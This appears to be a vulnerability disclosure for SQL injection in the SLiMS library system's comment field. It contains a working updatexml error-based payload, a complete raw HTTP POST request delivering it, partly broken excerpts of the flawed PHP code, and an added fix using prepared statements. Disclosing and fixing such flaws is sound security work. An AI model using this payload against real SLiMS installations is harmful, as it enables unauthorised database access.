SQL injection exists in the lib/comment.inc.php file. The comment field has no effective sanitization, which allows SQL injection attacks.
![5](https://user-images.githubusercontent.com/18564938/147071549-90380ba8-eeeb-4bb7-86b0-718de1df0f22.png)
![6](https://user-images.githubusercontent.com/18564938/147071593-bc47a5f7-f068-4c76-b424-a02c954c7eb4.png)
Log in as an ordinary user, open a book's detail page ("find a book") and submit the following in the comment field (example):

```
'and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1) )/**/and/**/'1'='1
```
SQL injection request:

```http
POST /index.php?p=show_detail&id=17 HTTP/1.1
Host: 192.168.31.63
Content-Length: 110
Cache-Control: max-age=0
Origin: http://192.168.31.63
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3; q=0.9
Referer: http://192.168.31.63/index.php?p=show_detail&id=17
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin_logged_in=1; ckCsrfToken=QlUPE9DlsBjESqNjH6x7Mb9y7y7cIl24Tq13u7c6; SenayanMember=do2fk5pq9qdkqo1phadksnm0u9
Connection: close

comment='and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1))/**/and/**/'1'='1&SaveComment=Save+comment
```
Vulnerable code:

```php
$_sql = "Select c.comment, m.member_name, c.input_date from comment AS c
LEFT JOIN biblio AS b ON b.biblio_id = c.biblio_id
LEFT JOIN member AS m ON m.member_id = c.member_id
WHERE b.biblio_id = ".$_detail_id.        // request-controlled value concatenated straight into the SQL text
" ORDER BY c.last_update DESC";
$commlist = $dbs->query($_sql);
if ($commlist) {
    $_all_recs = $commlist->num_rows;
}
if ($_all_recs > 0) {
    $_page = ($page - 1) * $_recs_each_page;
    $_sql .= " Limit ".$_page.", ".$_recs_each_page;   // paging values are concatenated the same way
    $commlist = $dbs->query($_sql);
    // The HTML markup inside the string literals below was lost when the issue was rendered.
    $_list_comment .= '
    '.$_all_recs.__(' comments available').'
    ';
    while ($_data = $commlist->fetch_assoc()) {
        $_list_comment .= '
        $_list_comment .= '
        $_list_comment .= '
        $_list_comment .= '
    }
    $_list_comment .= '
}
if (ISSET($_SESSION['mid'])) {
    ';// Comment form
    $_forms = '
    $_forms .= simbio_form_element::textField('textarea', 'comment', '', 'placeholder="Add your comment" class="comment-input form-control"').'
    ';
    $_forms .= '';
    $_forms .= \Volnix\CSRF\CSRF::getHiddenInputString();
    $_forms .= '';
return $_list_comment.$_forms;
```
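As an added example (not SLiMS project code), the same two database operations written with mysqli prepared statements: the listing query from the snippet above with `$_detail_id` and the paging values bound as integers, and the save path with the comment text bound as a string. It assumes `$dbs` is the mysqli connection the original uses, that the `comment` table has the columns named in the original SELECT, and that the mysqlnd driver is present for `get_result()`.

```php
<?php
// Added example, not SLiMS code. Assumes $dbs is a mysqli connection (as in the
// original snippet) and that the comment table has the columns named in the
// original SELECT: biblio_id, member_id, comment, input_date, last_update.

/** Store a comment; the user-controlled text is bound, never concatenated. */
function saveComment(mysqli $dbs, int $biblioId, int $memberId, string $comment): bool
{
    $stmt = $dbs->prepare(
        'INSERT INTO comment (biblio_id, member_id, comment, input_date, last_update)
         VALUES (?, ?, ?, NOW(), NOW())'
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $dbs->error);
    }
    // "iis": two integers and one string. The text is sent to the server as a
    // parameter value, so quotes, /**/ comments and function calls in it are data.
    $stmt->bind_param('iis', $biblioId, $memberId, $comment);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

/** List comments for one record, with the LIMIT values bound rather than spliced in. */
function fetchComments(mysqli $dbs, $detailId, int $page, int $recsEachPage): array
{
    $detailId = (int) $detailId;                  // a biblio id is only ever numeric
    $offset   = max(0, ($page - 1) * $recsEachPage);

    $stmt = $dbs->prepare(
        'SELECT c.comment, m.member_name, c.input_date FROM comment AS c
         LEFT JOIN biblio AS b ON b.biblio_id = c.biblio_id
         LEFT JOIN member AS m ON m.member_id = c.member_id
         WHERE b.biblio_id = ?
         ORDER BY c.last_update DESC
         LIMIT ?, ?'
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $dbs->error);
    }
    $stmt->bind_param('iii', $detailId, $offset, $recsEachPage);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC); // get_result() needs mysqlnd
    $stmt->close();
    return $rows;
}
```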